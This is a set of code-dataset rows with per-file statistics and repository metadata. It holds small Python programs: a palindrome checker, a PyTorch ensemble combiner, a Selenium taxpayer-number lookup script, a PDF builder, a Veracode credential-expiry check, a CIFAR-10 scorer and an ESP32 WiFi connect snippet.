userword = None
reverseword = None
def palindrome_check():
userword = list(input("Enter the word you want to check: ").strip().lower())
reverseword = userword[0:]
reverseword.reverse()
if reverseword == userword:
print("That is indeed a palindrome.")
elif reverseword is not userword:
print("That is not a palindrome.")
else:
print("Something went terribly wrong, contact script author.")
palindrome_check()
| 43.736842
| 210
| 0.726113
| 618
| 4,155
| 4.843042
| 0.368932
| 0.084196
| 0.026061
| 0.036084
| 0.107918
| 0.080187
| 0.028065
| 0.028065
| 0
| 0
| 0
| 0.017317
| 0.180024
| 4,155
| 95
| 211
| 43.736842
| 0.861168
| 0.505415
| 0
| 0.037037
| 0
| 0.018519
| 0.324006
| 0.013255
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0
| 0
| 0.111111
| 0.222222
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
bb5dfba5c5533938d6a17b1b05c8c187bd4dad1b
| 3,450
|
py
|
Python
|
models/combiner/combiner_network.py
|
tunasoup/multimodal-scene-classification
|
85f72da3f6ab947fff0929a6ff0e4a8d1fd34377
|
[
"MIT"
] | null | null | null |
models/combiner/combiner_network.py
|
tunasoup/multimodal-scene-classification
|
85f72da3f6ab947fff0929a6ff0e4a8d1fd34377
|
[
"MIT"
] | null | null | null |
models/combiner/combiner_network.py
|
tunasoup/multimodal-scene-classification
|
85f72da3f6ab947fff0929a6ff0e4a8d1fd34377
|
[
"MIT"
] | null | null | null |
"""
Contains the trainable sub-network of an ensemble classifier.
Handles calling the training and evaluation.
"""
import torch
import torch.nn as nn
import torch.optim as optim
from matplotlib.pyplot import show
from utility.fusion_functions import (train_nn_combiner_model,
test_nn_combiner)
from definitions import (MODELS_TRAIN_OUTPUTS_FILE, MODELS_VAL_OUTPUTS_FILE,
MODELS_TEST_OUTPUTS_FILE,
BEST_COMBINER_MODEL)
from utility.utilities import FusionData, Features
class CombinerModel(nn.Module):
def __init__(self):
super(CombinerModel, self).__init__()
self.input_dim = 40 # Label count * base model count
self.model = nn.Sequential(
nn.Linear(self.input_dim, 32),
nn.BatchNorm1d(32),
nn.ReLU(),
nn.Linear(32, 10)
)
def forward(self, x):
x = x.flatten(start_dim=1)
x = self.model(x)
return x
if __name__ == '__main__':
run_train = True
run_test = True
device = 'cuda:0' if torch.cuda.is_available() else 'cpu'
print(device)
model_ensemble = CombinerModel()
if run_train:
optimizer = optim.Adam(model_ensemble.parameters(), lr=0.000020)
epochs = 100
batch_size = 32
feature_train = Features(feature_file=MODELS_TRAIN_OUTPUTS_FILE,
arg_names=['X', 'y'])
data_train = FusionData(features=[feature_train], do_reshape=False)
feature_val = Features(feature_file=MODELS_VAL_OUTPUTS_FILE,
arg_names=['X', 'y'])
data_val = FusionData(features=[feature_val], do_reshape=False)
train_nn_combiner_model(model=model_ensemble,
optimizer=optimizer,
train_data=data_train.get_data(),
val_data=data_val.get_data(),
best_model=BEST_COMBINER_MODEL,
device=device,
epochs=epochs,
batch_size=batch_size)
if run_test:
feature_test = Features(feature_file=MODELS_TEST_OUTPUTS_FILE,
arg_names=['X', 'y'])
data_test = FusionData(features=[feature_test], do_reshape=False)
model_ensemble.load_state_dict(torch.load(BEST_COMBINER_MODEL))
model_ensemble.eval()
test_nn_combiner(model=model_ensemble,
test_data=data_test.get_data(),
device=device,
verbose=True)
show()
"""
with logits, lr=0.000015, test: 0.872 (epoch 87) batchnormed, 0.871 without
with probabilities, lr=0.000025, test: 0.872 (epoch 46) batchnormed, 0.849 without
with softmax of probabilities, lr=0.000025 test: 0.872 (epoch 46) batchnormed, 0.814 without higher lr
with softmax of logits, lr=0.000020, 0.865, (epoch 46) batchnormed,
with logits:
test: 0.872 val: 0.892 val_loss: 0.2937 avg: 86.61% test_loss: 0.3840
optimizer = optim.Adam(model_ensemble.parameters(), lr=0.000015)
epochs = 92 # (87), 0.871 without batchnorm
batch_size = 32
self.model = nn.Sequential(
nn.Linear(self.input_dim, 32),
nn.BatchNorm1d(32),
nn.ReLU(),
#nn.Dropout(0.5),
nn.Linear(32, 10)
)
"""
| 35.9375
| 102
| 0.595072
| 416
| 3,450
| 4.6875
| 0.307692
| 0.046667
| 0.01641
| 0.038462
| 0.238462
| 0.201538
| 0.201538
| 0.163077
| 0.117949
| 0.117949
| 0
| 0.058502
| 0.311304
| 3,450
| 95
| 103
| 36.315789
| 0.762205
| 0.04
| 0
| 0.084746
| 0
| 0
| 0.009023
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033898
| false
| 0
| 0.118644
| 0
| 0.186441
| 0.016949
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
bb63df222835f6eb78ba3c732e704619ca12b613
| 899
|
py
|
Python
|
data/transcoder_evaluation_gfg/python/CHECK_STRING_FOLLOWS_ANBN_PATTERN_NOT.py
|
mxl1n/CodeGen
|
e5101dd5c5e9c3720c70c80f78b18f13e118335a
|
[
"MIT"
] | 241
|
2021-07-20T08:35:20.000Z
|
2022-03-31T02:39:08.000Z
|
data/transcoder_evaluation_gfg/python/CHECK_STRING_FOLLOWS_ANBN_PATTERN_NOT.py
|
mxl1n/CodeGen
|
e5101dd5c5e9c3720c70c80f78b18f13e118335a
|
[
"MIT"
] | 49
|
2021-07-22T23:18:42.000Z
|
2022-03-24T09:15:26.000Z
|
data/transcoder_evaluation_gfg/python/CHECK_STRING_FOLLOWS_ANBN_PATTERN_NOT.py
|
mxl1n/CodeGen
|
e5101dd5c5e9c3720c70c80f78b18f13e118335a
|
[
"MIT"
] | 71
|
2021-07-21T05:17:52.000Z
|
2022-03-29T23:49:28.000Z
|
# Copyright (c) 2019-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
#
def f_gold ( str ) :
n = len ( str )
for i in range ( n ) :
if ( str [ i ] != 'a' ) :
break
if ( i * 2 != n ) :
return False
for j in range ( i , n ) :
if ( str [ j ] != 'b' ) :
return False
return True
#TOFILL
if __name__ == '__main__':
param = [
('ba',),
('aabb',),
('abab',),
('aaabb',),
('aabbb',),
('abaabbaa',),
('abaababb',),
('bbaa',),
('11001000',),
('ZWXv te',)
]
n_success = 0
for i, parameters_set in enumerate(param):
if f_filled(*parameters_set) == f_gold(*parameters_set):
n_success+=1
print("#Results: %i, %i" % (n_success, len(param)))
| 23.051282
| 64
| 0.506118
| 113
| 899
| 3.876106
| 0.584071
| 0.054795
| 0.027397
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.024793
| 0.32703
| 899
| 39
| 65
| 23.051282
| 0.699174
| 0.205784
| 0
| 0.068966
| 0
| 0
| 0.114569
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034483
| false
| 0
| 0
| 0
| 0.137931
| 0.034483
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
bb66ace576783c81b7f71f58e215ed9554b532e3
| 1,249
|
py
|
Python
|
iipython/embeds.py
|
plasma-chat/plugins
|
58dc5e6520e62fb473eb4fda4292b9adb424b75d
|
[
"MIT"
] | null | null | null |
iipython/embeds.py
|
plasma-chat/plugins
|
58dc5e6520e62fb473eb4fda4292b9adb424b75d
|
[
"MIT"
] | null | null | null |
iipython/embeds.py
|
plasma-chat/plugins
|
58dc5e6520e62fb473eb4fda4292b9adb424b75d
|
[
"MIT"
] | null | null | null |
# Copyright 2022 iiPython
# Modules
import time
# Initialization
embed_size = 45
# Plugin class
class EmbedPlugins(object):
def __init__(self, eventmgr) -> None:
self.meta = {
"name": "Embeds",
"author": "iiPython",
"id": "embeds"
}
self.eventmgr = eventmgr
def center(self, line: str) -> str:
padding = round((embed_size - len(line)) / 2)
return (" " * padding) + line + (" " * padding)
def normalize(self, lines: str, tags: str) -> str:
new, longest = [], len(max(lines, key = len))
for line in lines:
new.append(f"{tags}" + line + (" " * (longest - len(line))))
return new
def on_call(self, args: list) -> str:
try:
title, body = args[0], args[1]
except IndexError:
return self.print("usage: /embeds <title> <body>")
# Make footer
footer = time.strftime("%I:%M %p · %Z")
# Construct embed
embed_lines = [self.center(line) for line in [title] + [body[i:i + (embed_size - 10)] for i in range(0, len(body), embed_size - 10)] + ["", footer]]
return "\n".join(self.normalize(embed_lines, args[2] if len(args) > 2 else "[bglblack]"))
| 29.046512
| 156
| 0.542834
| 153
| 1,249
| 4.366013
| 0.470588
| 0.053892
| 0.026946
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.018307
| 0.30024
| 1,249
| 42
| 157
| 29.738095
| 0.744851
| 0.069656
| 0
| 0
| 0
| 0
| 0.082251
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.153846
| false
| 0
| 0.038462
| 0
| 0.384615
| 0.038462
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
bb66fc7050d575d46b09f705e4a0c71d8c66cda1
| 11,303
|
py
|
Python
|
inn.py
|
NLipatov/INNer
|
88816c91bfb85f287b734aff69a5b60ad43f129e
|
[
"MIT"
] | null | null | null |
inn.py
|
NLipatov/INNer
|
88816c91bfb85f287b734aff69a5b60ad43f129e
|
[
"MIT"
] | null | null | null |
inn.py
|
NLipatov/INNer
|
88816c91bfb85f287b734aff69a5b60ad43f129e
|
[
"MIT"
] | null | null | null |
import time, os, xlrd, xlwt, re, webbrowser, time_convert, Process_killer, tkinter as tk
from tkinter import messagebox as mb
from xlwt import easyxf
from threading import Thread
from selenium import webdriver
from selenium.common.exceptions import SessionNotCreatedException
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.chrome.service import Service
from subprocess import CREATE_NO_WINDOW
from xlutils.copy import copy
direction = None
workbookname = None
status = ''
def DirWor(Dir, Wor):
global direction
global workbookname
direction = Dir
workbookname = Wor
innermessage = 'Работа над файлом'
message = ''
refreshedINN = 0
def Add_to_Message(arg):
global message
message += str( arg )
def Get_message():
return innermessage + message
def TT():
os.chdir( direction )
def Draw():
global text, status
status = 'Файл в работе'
frame = tk.Frame( root, relief='solid', bd=1, bg='grey' )
root.geometry( '700x90+500+600' )
root.iconbitmap( r"C:\INNer\INNERICC.ico" )
root.iconbitmap( r"C:\INNer\INNERICC.ico" )
root.title( 'Файл в работе' )
try:
window.iconbitmap( r"C:\INNer\INNERICC.ico" )
except:
pass
frame.pack()
text = tk.Label( frame, text='HELLO' )
text.pack( side='top' )
def Refresher():
global text
text.configure( text=Get_message() )
root.after( 1000, Refresher )
if status == 'Готово':
root.title( status )
root.lift()
root.attributes( '-topmost', True )
root.after_idle( root.attributes, '-topmost', False )
else:
root.title( status )
root = tk.Tk()
Draw()
Refresher()
root.mainloop()
def Main():
global innermessage, message, status
DriverPath = r'C:\INNer\chromedriver.exe'
os.chdir( direction )
TotalWorkingTimeStart = time.time()
Chk1 = 0
DriverPathExist = os.path.isfile( DriverPath )
if DriverPathExist == True:
pass
else:
while True:
status = 'Ошибка'
innermessage = 'Ошибка'
message = ('Не обнаружен chromedriver.exe в папке с INNer\'ом')
pass
workbook = xlrd.open_workbook( workbookname )
sheet = workbook.sheet_by_index( 0 )
workbookWT = xlrd.open_workbook( (workbookname), formatting_info=True )
sheetWT = workbookWT.sheet_by_index( 0 )
wb = copy( workbookWT )
wbsheet = wb.get_sheet( 0 )
options = Options()
options.add_argument( '--headless' )
options.add_argument( '--disable-gpu' )
options.add_experimental_option( 'excludeSwitches', ['enable-logging'] )
try:
driver = webdriver.Chrome( f'{DriverPath}', options=options )
except SessionNotCreatedException as session_not_created_ex:
error_text = str( session_not_created_ex )[29:]
status = 'Ошибка'
innermessage = 'Описание возникшей ошибки:'
message = (f'\n{error_text}')
if mb.askyesno( title='Требуется обновление chromedriver.exe', \
message='Перейти на страницу загрузи chromedriver?' ):
Process_killer.process_kill( 'chromedriver.exe' )
webbrowser.open( 'https://chromedriver.chromium.org/downloads' )
mb.showinfo( title='Подсказка', \
message='После загрузки новой версии \'chromedriver.exe\',\
скопируйте её в C:\INNer с заменой файлов' )
while True:
pass
TotalClientsNumber = sheet.nrows - 1
TotalClientsNumberNowWorking = 0
RFW = 1
infoApproxTime = (f'Ожидаемое время работы {(3.7 * sheet.nrows - TotalClientsNumber) / 60} минут(-ы)\n\n\n')
message = str( infoApproxTime )
try:
for i in range( 1, sheet.nrows ):
message = str( f'\n\nКлиентов обработано: {TotalClientsNumberNowWorking}/{TotalClientsNumber}\n' )
ST = time.time()
RFW = i
translit_name = sheet.cell_value( i, 5 )
re_res = re.findall( r'^\w+', f'{translit_name}' )
if re_res[0].lower() in ['mister', 'mistress', 'mizz', 'miss', 'mr', 'mrs', 'miss', 'ms', 'dr']:
corrected_translit_name = translit_name.replace( f'{re_res[0]} ', '' )
wbsheet.write( i, 5, corrected_translit_name, easyxf( 'font: name Calibri, height 220;' ) )
wb.save( 'INNERED — ' + workbookname )
nam = sheet.cell_value( i, 2 )
if nam == '':
message += str( '\n\n\nBreak. File ends here — blank cell at clients name\n\n\n' )
break
otch = sheet.cell_value( i, 3 )
lotch = str( sheet.cell_value( i, 3 ) ).lower()
fam = sheet.cell_value( i, 4 )
pnum = sheet.cell_value( i, 7 ) + sheet.cell_value( i, 8 )
bdate = sheet.cell_value( i, 19 ).replace( '-', '' )
if lotch == '' or lotch == 'отсутствует' or lotch == 'нет' or lotch == '-':
middle_name = False
else:
middle_name = True
if middle_name:
infoNowWorkingOnClient = str( f'Приступил к: {fam} {nam[0]}. {otch[0]}.' )
print(middle_name)
elif not middle_name:
infoNowWorkingOnClient = str( f'Приступил к: {fam} {nam[0]}.' )
print( middle_name )
message = message + str( infoNowWorkingOnClient )
refreshedINN = 0
if RFW != i:
Chk1 += 1
while True:
status = 'Ошибка'
innermessage = 'Ошибка'
message = ('Критическая ошибка: RFW != i!')
pass
if fam == sheet.cell_value( i, 4 ):
pass
else:
while True:
status = 'Ошибка'
innermessage = 'Ошибка'
message = ('\nЗавершение работы - Критическая ошибка - Фамилия из сайта и из файла не совпали')
pass
if Chk1 < 1:
for i in range( 0, 10 ):
try:
driver.get( 'https://service.nalog.ru/static/personal-data.html?svc=inn&from=%2Finn.do' )
driver.find_element_by_id( "unichk_0" ).click()
driver.find_element_by_id( "btnContinue" ).click()
time.sleep( 0.5 )
for i in range( 0, (len( fam )) ):
driver.find_element_by_name( "fam" ).send_keys( fam[i] )
for i in range( 0, (len( nam )) ):
driver.find_element_by_name( "nam" ).send_keys( nam[i] )
if lotch == '' or lotch == 'отсутствует' or lotch == 'нет' or lotch == '-':
driver.find_element_by_xpath( '//*[@id="unichk_0"]' ).click()
else:
for i in range( 0, (len( otch )) ):
driver.find_element_by_name( "otch" ).send_keys( otch[i] )
for i in range( 0, (len( bdate )) ):
driver.find_element_by_name( "bdate" ).send_keys( bdate[i] )
for i in range( 0, (len( pnum )) ):
driver.find_element_by_name( "docno" ).send_keys( pnum[i] )
driver.find_element_by_id( "btn_send" ).click()
break
except:
status = 'Ошибка'
innermessage = 'Ошибка возникла до получения результата запроса, после отправки запроса.'
for i in range( 0, 10 ):
try:
result = driver.find_element_by_xpath( '//*[@id="result_1"]/div' ).text
if result == '':
time.sleep( 0.5 )
if i == 9:
res_msg = driver.find_element_by_xpath(
'/html/body/div[1]/div[3]/div/form/div[1]/div[1]/div/div[2]/p[1]' ).text
status = 'Ошибка'
innermessage = f'{res_msg}'
TotalClientsNumberNowWorking += 1
wbsheet.write( RFW, 17, '-' )
break
else:
wbsheet.write( RFW, 17, (result[32:69]) )
ET = time.time()
print( f'\nИНН:{result[32:69]}' )
wb.save( 'INNERED — ' + workbookname )
status = 'Файл в работе'
innermessage = f'Записал — ИНН клиента {fam}: {result[32:69]}' + \
'\nРезультат получен и записан за %.1f секунды' % ((ET - ST))
TotalClientsNumberNowWorking += 1
break
except:
if i == 9:
status = 'Файл в работе'
innermessage = 'Не нашёл элемент, содержащий ИНН'
message = (f'i - {i}, fam - {fam}')
wbsheet.write( RFW, 17, '-' )
wb.save( 'INNERED — ' + workbookname )
TotalClientsNumberNowWorking += 1
else:
status = 'Критическая ошибка'
innermessage = 'Работа программы остановлена'
message = ('Не пройдена проверка Chk1.')
except PermissionError:
status = 'Критическая ошибка'
innermessage = 'Работа программы остановлена'
message = ('Критическая ошибка — Файл нужно закрыть!')
driver.quit()
if Chk1 == 0:
status = 'Готово!'
innermessage = '\nРабота завершена остановлена'
message = ('\nФайл обработан')
else:
status = 'Результат работы не подлежит использованию!'
innermessage = 'Внимание:'
message = ('Работа завершена с ошибками!')
while True:
pass
TotalWorkingTimeEnd = time.time()
innermessage = 'Готово'
EndingA = ('\nПрограмма отработала за %.1f минут(-ы)' % (((TotalWorkingTimeEnd - TotalWorkingTimeStart) / 60)))
EndingB = ('\nТемп равен %.1f секунд(-ы) на одного клиента' % (
((TotalWorkingTimeEnd - TotalWorkingTimeStart) / sheet.nrows)))
message = str( EndingA )
message += str( EndingB )
workbook.release_resources()
status = 'Работа завершена'
def Start():
MAin_thread = Thread( target=Main )
MAin_thread.start()
TT_thread = Thread( target=TT )
TT_thread.start()
# Destroyer_thread = Thread(target=Destroyer())
# Destroyer_thread.start()
# MAin_thread.join()
# TT_thread.join()
| 41.862963
| 116
| 0.508891
| 1,116
| 11,303
| 5.061828
| 0.305556
| 0.019472
| 0.033103
| 0.036998
| 0.203222
| 0.137723
| 0.111524
| 0.088865
| 0.052753
| 0.033634
| 0
| 0.016064
| 0.383173
| 11,303
| 269
| 117
| 42.018587
| 0.793316
| 0.009378
| 0
| 0.3125
| 0
| 0
| 0.184839
| 0.022704
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033333
| false
| 0.033333
| 0.041667
| 0.004167
| 0.079167
| 0.0125
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
bb67eb4b7ecd3f699aaf7a537dafe8901082a0fc
| 1,474
|
py
|
Python
|
pdf_gen.py
|
MasatoHanayama/pdf_gen
|
b16491a31cea0d1a4931e979d600870d6be07c3e
|
[
"MIT"
] | 1
|
2022-03-15T12:57:46.000Z
|
2022-03-15T12:57:46.000Z
|
pdf_gen.py
|
MasatoHanayama/pdf_gen
|
b16491a31cea0d1a4931e979d600870d6be07c3e
|
[
"MIT"
] | null | null | null |
pdf_gen.py
|
MasatoHanayama/pdf_gen
|
b16491a31cea0d1a4931e979d600870d6be07c3e
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
import argparse
import img2pdf
import tqdm
from natsort import natsorted
from PIL import Image
def pdf_gen(src, dst):
pages = []
for file in natsorted(os.listdir(src)):
if os.path.splitext(file)[-1] == '.jpg' or os.path.splitext(file)[-1] == '.jpeg' or os.path.splitext(file)[-1] == '.png':
pages.append(os.path.join(src, file))
if len(pages) == 0:
print("Failed: {}".format(src))
return
with open(dst, 'wb') as pdf:
pdf.write(img2pdf.convert(pages))
def webp2png(src):
for file in natsorted(os.listdir(src)):
if os.path.splitext(file)[-1] == '.webp':
im = Image.open(os.path.join(src, file)).convert('RGB')
im.save(os.path.join(src, '{}.png'.format(os.path.splitext(file)[0])), 'png')
os.remove(os.path.join(src, file))
def main(src_path):
dirs = [f.path for f in os.scandir(src_path) if f.is_dir()]
# for dir in tqdm.tqdm(dirs):
for dir in dirs:
print(dir)
webp2png(dir)
pdf_gen(dir, '{}.pdf'.format(dir))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('src', help='src dir')
args = parser.parse_args()
main(args.src)
# dirs = [f.path for f in os.scandir(args.src) if f.is_dir()]
# # for dir in tqdm.tqdm(dirs):
# for dir in dirs:
# print(dir)
# webp2png(dir)
# pdf_gen(dir, '{}.pdf'.format(dir))
| 28.346154
| 129
| 0.586839
| 220
| 1,474
| 3.854545
| 0.295455
| 0.063679
| 0.082547
| 0.106132
| 0.475236
| 0.415094
| 0.365566
| 0.365566
| 0.308962
| 0.308962
| 0
| 0.010667
| 0.236771
| 1,474
| 51
| 130
| 28.901961
| 0.743111
| 0.154003
| 0
| 0.060606
| 0
| 0
| 0.053355
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.181818
| 0
| 0.30303
| 0.060606
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
bb67fb540424cdb298487932ac6c8b19b1c4e193
| 1,113
|
py
|
Python
|
userapiexpiry.py
|
tjarrettveracode/veracode-python-api_credentials_expiry-example
|
3188c53f81c4bf0b5f4d27f4aa1dc3de2f3f5aef
|
[
"MIT"
] | null | null | null |
userapiexpiry.py
|
tjarrettveracode/veracode-python-api_credentials_expiry-example
|
3188c53f81c4bf0b5f4d27f4aa1dc3de2f3f5aef
|
[
"MIT"
] | null | null | null |
userapiexpiry.py
|
tjarrettveracode/veracode-python-api_credentials_expiry-example
|
3188c53f81c4bf0b5f4d27f4aa1dc3de2f3f5aef
|
[
"MIT"
] | null | null | null |
import sys
import requests
import datetime
from dateutil.parser import parse
from veracode_api_py import VeracodeAPI as vapi
def creds_expire_days_warning():
creds = vapi().get_creds()
exp = datetime.datetime.strptime(creds['expiration_ts'], "%Y-%m-%dT%H:%M:%S.%f%z")
delta = exp - datetime.datetime.now().astimezone() #we get a datetime with timezone...
if (delta.days < 7):
print('These API credentials expire {}'.format(creds['expiration_ts']))
def main():
# CHECK FOR CREDENTIALS EXPIRATION
creds_expire_days_warning()
data = vapi().get_users()
for user in data:
data2 = vapi().get_user(user["user_id"])
if "api_credentials" in data2:
date_time_str = parse(data2["api_credentials"]["expiration_ts"])
date = date_time_str.date()
time = date_time_str.time()
print("User {} API Credentials expiration date is {} {}".format(user["user_name"],str(date),str(time)))
else:
print("User {} has no API credentials".format(user["user_name"]))
if __name__ == '__main__':
main()
| 32.735294
| 115
| 0.645103
| 147
| 1,113
| 4.659864
| 0.414966
| 0.10219
| 0.048175
| 0.064234
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.004582
| 0.215633
| 1,113
| 34
| 116
| 32.735294
| 0.780069
| 0.060198
| 0
| 0
| 0
| 0
| 0.222967
| 0.021053
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08
| false
| 0
| 0.2
| 0
| 0.28
| 0.12
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
bb68392d7aa3e6ae41470c5c442a63fe00343194
| 3,258
|
py
|
Python
|
recipes/tensorflow/samples/pytorch/cifar10/samples/tensorflow/scorer.py
|
arturrutkiewicz-divae/aep-rfm-score
|
705fc54e505fdb8763073401be7b97c81474b0a9
|
[
"Apache-2.0"
] | 18
|
2018-12-13T18:53:31.000Z
|
2021-09-29T20:14:05.000Z
|
recipes/tensorflow/samples/pytorch/cifar10/samples/tensorflow/scorer.py
|
DalavanCloud/experience-platform-dsw-reference
|
2e0af85a47ec05b7cda77d61954c1cde0a625f5c
|
[
"Apache-2.0"
] | 27
|
2019-01-02T22:52:51.000Z
|
2021-05-26T15:14:17.000Z
|
recipes/tensorflow/samples/pytorch/cifar10/samples/tensorflow/scorer.py
|
DalavanCloud/experience-platform-dsw-reference
|
2e0af85a47ec05b7cda77d61954c1cde0a625f5c
|
[
"Apache-2.0"
] | 18
|
2019-01-09T19:34:57.000Z
|
2020-10-19T11:06:50.000Z
|
#
# Copyright 2017 Adobe.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from ml.runtime.tensorflow.Interfaces.AbstractScorer import AbstractScorer
import tensorflow as tf
import numpy
import torch
import torchvision
import torchvision.transforms as transforms
import torch.nn as nn
import torch.nn.functional as F
class Scorer(AbstractScorer):
def score(self, config={}):
"""loads trained weights and scores on test cofar-10 data
load trained model using the weights,
load the test dataset,
score and compute accuracy
:param config: passed on by ml-framework
:return: None
"""
print("Executed scorer 2")
print(config["modelPATH"])
print(config["logsPATH"])
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv1 = nn.Conv2d(3, 6, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(6, 16, 5)
self.fc1 = nn.Linear(16 * 5 * 5, 120)
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, 10)
def forward(self, x):
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = x.view(-1, 16 * 5 * 5)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return x
transform = transforms.Compose(
[transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])
testset = torchvision.datasets.CIFAR10(root='./data',
train=False,
download=True,
transform=transform)
testloader = torch.utils.data.DataLoader(testset,
batch_size=4,
shuffle=False,
num_workers=2)
net = Net()
state_dict = torch.load(config["modelPATH"] +
"/my_cifar_pytorch_model.dict")
net.load_state_dict(state_dict)
correct = 0
total = 0
with torch.no_grad():
for data in testloader:
images, labels = data
outputs = net(images)
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += (predicted == labels).sum().item()
print('Accuracy of the network on the 10000 test images: %d %%' % (
100 * correct / total))
| 34.659574
| 75
| 0.533456
| 380
| 3,258
| 4.523684
| 0.45
| 0.034904
| 0.008726
| 0.011635
| 0.029087
| 0.029087
| 0.029087
| 0.006981
| 0.006981
| 0.006981
| 0
| 0.039942
| 0.369859
| 3,258
| 93
| 76
| 35.032258
| 0.79737
| 0.229589
| 0
| 0
| 0
| 0
| 0.054076
| 0.011471
| 0
| 0
| 0
| 0
| 0
| 1
| 0.053571
| false
| 0
| 0.142857
| 0
| 0.25
| 0.071429
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
bb69a0519f4167f3e5c1740dabcb4206f8eb16f8
| 261
|
py
|
Python
|
Projects/ESP32Micropython/flash memory/newConnectTest.py
|
TizioMaurizio/ArduinoWorkshop
|
d38ede91c6b7a925eafb0272a5fa9f44885ae017
|
[
"MIT"
] | null | null | null |
Projects/ESP32Micropython/flash memory/newConnectTest.py
|
TizioMaurizio/ArduinoWorkshop
|
d38ede91c6b7a925eafb0272a5fa9f44885ae017
|
[
"MIT"
] | null | null | null |
Projects/ESP32Micropython/flash memory/newConnectTest.py
|
TizioMaurizio/ArduinoWorkshop
|
d38ede91c6b7a925eafb0272a5fa9f44885ae017
|
[
"MIT"
] | null | null | null |
import network
import time
sta_if = network.WLAN(network.STA_IF)
sta_if.active(True)
for _ in range(10):
sta_if.connect('RedmiMau', 'mau12397')
time.sleep(1)
if sta_if.isconnected():
print('Connected.')
break
time.sleep(11)
else:
print('Fail')
| 20.076923
| 39
| 0.701149
| 40
| 261
| 4.425
| 0.6
| 0.141243
| 0.079096
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.045045
| 0.149425
| 261
| 13
| 40
| 20.076923
| 0.752252
| 0
| 0
| 0
| 0
| 0
| 0.114504
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.153846
| 0
| 0.153846
| 0.153846
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
bb6b66c4796e5839d80de0a9f7880f3c7a632215
| 2,829
|
py
|
Python
|
cogs/start.py
|
